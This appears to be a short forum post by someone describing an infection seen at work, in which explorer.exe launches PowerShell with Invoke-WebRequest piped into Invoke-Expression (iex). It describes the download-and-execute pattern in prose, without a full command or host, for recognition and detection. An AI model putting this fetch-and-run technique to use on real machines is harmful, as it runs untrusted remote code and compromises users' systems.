Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.